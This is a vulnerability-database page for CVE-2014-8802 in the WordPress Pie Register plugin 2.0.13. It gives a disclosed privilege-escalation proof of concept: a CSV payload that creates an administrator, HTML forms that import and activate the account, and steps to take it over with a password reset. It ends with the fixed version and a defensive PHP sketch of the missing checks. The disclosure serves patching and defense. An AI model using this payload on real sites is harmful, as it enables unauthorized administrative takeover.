| Title | Published | Views | Family |
|---|---|---|---|
| Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation Vulnerability | 17 Jan 2015 00:00 | – | zdt |
| WordPress Plugin Pie Register Has Unspecified Vulnerability | 26 Jan 2015 00:00 | – | cnvd |
| CVE-2014-8802 | 23 Jan 2015 15:00 | – | cve |
| CVE-2014-8802 | 23 Jan 2015 15:00 | – | cvelist |
| EUVD-2014-8632 | 7 Oct 2025 00:30 | – | euvd |
| WordPress Plugin Pie Register 2.0.13 - Privilege Escalation | 16 Jan 2015 00:00 | – | exploitpack |
| CVE-2014-8802 | 23 Jan 2015 15:59 | – | nvd |
| WordPress Pie Register Plugin 2.0.13 - Privilege Escalation | 16 Jan 2015 00:00 | – | patchstack |
| Deserialization of untrusted data | 23 Jan 2015 15:59 | – | prion |
| Pie Register <= 2.0.13 - Privilege escalation | 17 Jan 2015 17:32 | – | wpvulndb |
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps
1. Description
Anyone can import a CSV file. Pie Register will import users from this file.
File: pie-register\pie-register.php
add_action( 'init', array($this,'pie_main') );
function pie_main() {
    // I skip unnecessary lines
    if(isset($_FILES['csvfile']['name'])) {
        $this->importUsers();
    }
}
http://security.szurek.pl/pie-register-2013-privilege-escalation.html
2. Proof of Concept
Create a CSV file based on the given example:
"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","[email protected]","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"
Import the account using:
<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
Input CSV<input type="file" name="csvfile">
<input type="submit" value="Add user!">
</form>
Create another standard account using wp-login.php?action=register.
After logging in, go to wp-admin/profile.php and search for "uid" in the page source.
The number after "uid" is our current account id. For example: "uid":"123".
We can assume that the previously imported admin account has id-1 (or id-x, where x is a natural number).
We can activate this account using:
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="verifyit" value="1">
Account id:<input type="text" name="vusers[]" value="">
<input type="submit" value="Activate user!">
</form>
Finally, we can reset the password using: http://wordpress-instalation/wp-login.php?action=lostpassword
3. Solution:
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
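For plugin authors reviewing similar import handlers, the sketch below shows the checks missing from the `pie_main` snippet in the description: a capability check, a nonce check, and an allow-list for the CSV "Role" column. It is an added example, not Pie Register code and not the 2.0.14 patch; the class name, nonce action and role allow-list are assumptions, while the WordPress functions called are core APIs.

```php
<?php
// Added example, not Pie Register code; class, nonce action and allow-list are hypothetical.
class Example_Safe_Importer {
    const NONCE_ACTION = 'example_import_users'; // hypothetical
    // Roles an import may assign; 'administrator' is deliberately absent.
    private static $allowed_roles = array( 'subscriber', 'contributor' );
    public function register() {
        // admin_init also fires for admin-ajax.php, so the hook choice is not
        // the access control; the checks in maybe_import() are.
        add_action( 'admin_init', array( $this, 'maybe_import' ) );
    }
    public function maybe_import() {
        if ( ! isset( $_FILES['csvfile']['tmp_name'] ) ) {
            return;
        }
        // Authorization: only accounts that may create users can import.
        if ( ! current_user_can( 'create_users' ) ) {
            wp_die( 'Not allowed to import users.', 'Forbidden', array( 'response' => 403 ) );
        }
        // CSRF: the upload form must include wp_nonce_field( self::NONCE_ACTION ).
        check_admin_referer( self::NONCE_ACTION );
        $tmp = $_FILES['csvfile']['tmp_name'];
        $fh  = is_uploaded_file( $tmp ) ? fopen( $tmp, 'r' ) : false;
        if ( false === $fh ) {
            return;
        }
        fgetcsv( $fh, 0, ',', '"', '\\' ); // skip the header row
        while ( ( $row = fgetcsv( $fh, 0, ',', '"', '\\' ) ) !== false ) {
            if ( count( $row ) >= 8 ) {
                $this->import_row( $row );
            }
        }
        fclose( $fh );
    }
    private function import_row( array $row ) {
        // Column order follows the CSV shown on this page; Role is column 8.
        $role = sanitize_key( $row[7] );
        if ( ! in_array( $role, self::$allowed_roles, true ) ) {
            $role = get_option( 'default_role' ); // never trust the file's role
        }
        wp_insert_user( array(
            'user_login'   => sanitize_user( $row[0], true ),
            'display_name' => sanitize_text_field( $row[1] ),
            'user_email'   => sanitize_email( $row[2] ),
            'user_pass'    => wp_generate_password( 24 ),
            'role'         => $role,
        ) );
    }
}
```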